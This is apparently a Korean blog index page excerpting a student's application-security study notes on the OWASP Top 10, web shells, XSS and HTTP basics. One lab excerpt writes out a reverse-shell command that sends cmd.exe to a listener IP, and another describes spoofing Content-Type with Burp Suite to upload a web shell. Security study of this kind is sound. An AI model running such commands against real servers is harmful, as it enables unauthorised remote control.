전체 글 (312) 썸네일형 리스트형 애플리케이션 보안4일차 OSWAP TOP 10 - oswap의 TOP 10 취약점을 알아야 하는 이유 가장 최신의 웹 보안 트렌드를 알 수 가있다. 전세계 보안 전문간들을 대상으로 설문을 한다. 상위 10개의 취약점이 전체의 약 95%에 해당한다, • reverse Web Shell 실습 reverse connection 방식으로 연결, Win2003의 RAT(netcat)을 이용해서 연결, 웹 브라우저에서 실행 우분투에서 nc -l -p 8000 명령어를 사용해 서버를 연다. -ㅣ : 듣기? -p : 포트번호 지정 window2003에 설치되어있는 웹 브라우저에 들어가 cmd WebShell 주소로 이동을 한다. c:\wine.exe 192.168.5.128 8000 -e cmd.exe 명령어를 입력 후 실행을 한다. win.. 애플리케이션 보안 3일차 Web Shell 관리자가 SSH, FTP를 이용하지 않고 웹 브라우저로 웹 서버를 관리하기 위한 도구 공격자들이 웹쉘을 웹 서버에 업로드해서 원격으로 조종이 가능하다. 대응 방법 1. 웹쉘을 업로드하지 못하게 해야 한다. 2. 업로드된 웹쉘은 동작하지 못하도록 해야 한다. (압축해서 보관, 읽기만 가능한 스토리지 보관) 3. 업로드한 웹쉘의 위치를 찾을 수 없도록 위치 경로를 알려주지 않거나 파일 이름을 바꾼다. 4. 웹쉘 대응 보안 솔루션을 배치한다. ex) 웹쉘의 Content-Type은 text/plain이지만, Proxy 도구(Burp Suite)를 이용해서 image/jpeg라고 속인다. => Clinet가 보내는 정보를 그대로 신뢰하는 경우, 실제 들어있는 파일은 다른 것(웹쉘) 임 • We.. 애플리케이션 보안 2일차 • XSS(Cross Site Scripting) 웹 애플리케이션에서 가장 기초적인 취약점 공격 방법이다. 악의적인 사용자가 공격하려는 사이트에 스크립트를 넣는 기법을 말한다. 입력 값 검증이 되지 않아 공격에 성공하면 사이트에 접속한 사용자는 삽입된 코드를 실행하게 되며 쿠키나 세션 토큰 등의 민감한 정보를 탈취하거나 HTML 페이지의 내용도 조작/변경이 가능하다. DBD(Drive by Download) 공격은 악성코드를 자연스럽게 다운하도록 유도한다. 원리는 사용자가 취약점이 있는 웹 사이트에 들어가면 스크립트 코드 등을 이용하여 악성 코드가 있는 웹으로 이동시킨다. 이때 자기도 모르게 다운로드를 하게 된다. 악성코드가 실행되면 랜섬웨어 또는 트로이목마가 동작할 수도 있다. ※ 악성 행위가 없어서 .. 애플리케이션 보안 1일차 1. Web 기본과 실습 환경 • HTTP 프로토콜과 HTML의 특징 1. HTTP(Hyper Text Tansfer Protocol)이란 웹 상에서 클라이언트와 서버가 서로 대화하기 위한 통신규약이다. 2. HTTP는 HTML 문서와 같은 리소스들을 가져올 수 있도록 해주는 프로토콜이다. 3. 계속 서버와 클라이언트의 연결 상태를 유지하는 게 아니기 때문에 클라이언트와 서버 간의 최대 연결수보다 많은 요청과 응답 처리가 가능하다. 4. 연결을 끊어버리기 때문에 클라이언트의 이전상황을 알 수 없다. (Stateless 상태 => Stateless 특징 때문에 정보를 유지하기 위해서 Cookie가 등장을 하였다.) ※ Cookie : HTTP의 일종으로서 인터넷 사용자가 어떠한 웹 사이트를 방문할 경우 사.. bee-box(실습 중) Kioptrix 보고서 log4j 취약점 Nmap NSE 이전 1 ··· 34 35 36 37 38 39 다음